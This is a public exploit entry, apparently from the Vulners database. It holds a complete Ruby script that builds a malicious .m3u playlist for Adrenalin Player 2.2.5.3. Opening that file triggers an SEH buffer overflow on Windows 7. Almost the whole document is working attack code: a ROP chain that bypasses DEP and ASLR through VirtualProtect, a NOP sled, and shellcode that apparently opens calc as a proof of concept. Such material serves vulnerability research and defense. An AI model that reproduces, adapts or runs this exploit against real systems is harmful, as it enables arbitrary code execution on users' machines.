Vulners
Lucene search
Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH) (ASLR + DEP Bypass)
#!/usr/bin env ruby
# Exploit Title: Adrenalin Player 2.2.5.3 (.m3u) SEH-Buffer Overflow ASLR+DEP Bypass
# Date: 3/2/2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor HomePage: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Software Link: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Version App: 2.2.5.3
# Tested on: Windows 7 x86 - Version 6.1.7600
# CVE:None
# Notes:-
# Offset to kernel32 - 0xF8C
# Offset to virtualProtect - 0xC039
filename = "motiv.m3u"
rop = ''
rop << [0x10129df6].pack('V') # PUSH ESP # POP ESI # RETN 0x10
rop << [0x10135eaf].pack('V') * 5 # RETN
rop << [0x1010c4c2].pack('V') # ADD ESP,20 # RETN
rop << 'VVVV' # VirtualProtect()
rop << 'WWWW' # return address
rop << 'XXXX' # lpAddress
rop << 'YYYY' # dwSize
rop << 'ZZZZ' # flNewProtect
rop << [0x1024bb98].pack('V') # lpOldProtect - writeable address
rop << [0x10135eaf].pack('V') * 2 # RETN (ROP NOP)
# kernel32 address
rop << [0x1003de9f].pack('V') # PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
rop << "AAAA" # FILLER
rop << [0x1005de8e].pack('V') # XCHG EAX,EBP # RETN
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xFFFFF074].pack('V') # OFFSET F8C
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1013a5e4].pack('V') # ADD EAX,EBP # RETN
rop << [0x1010010f].pack('V') # POP ECX # RETN
rop << [0xFFFFFFFF].pack('V') #
rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
rop << [0x1012014b].pack('V') # INC EAX # RETN
# virtualProtect Address
rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "XXXX" * 2 # FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << "AAAA" * 3 # FILLER
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xFFFF3FC7].pack('V') # OFSET C039
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "AAAA" * 2 # FILLER
rop << [0x1013c584].pack('V') # SUB EAX,ECX # RETN
rop << [0x1010010f].pack('V') # POP ECX # RETN
rop << [0xFFFFFFFF].pack('V') #
rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
# assign virtualprotect address
rop << [0x1006798b].pack('V') * 8 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA" # FILLER
# return address
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# lpAddress
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # RETN FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA" # FILLER
# dwSize
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xfffffcff].pack('V') # 300
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# flNewProtect
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # RETN FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xffffffc0].pack('V') # 40
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# Execute VirtualProtect
rop << [0x101263a0].pack('V') # XCHG EAX,ESP # RETN
sc =
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52" +
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E" +
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C" +
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F" +
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC"
xploit = rop
xploit << "\x90" * 256
xploit << sc
data = "A" * 2176
data[24,xploit.length] = xploit
data[2172+4,4] = [0x100d7aec].pack("V") # SEH - STACK PIVOT
File.open(filename,'w') do |fd|
fd.write data
puts "exploit file size : #{data.length.to_s}"
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2014 00:00Current
7High risk
Vulners AI Score7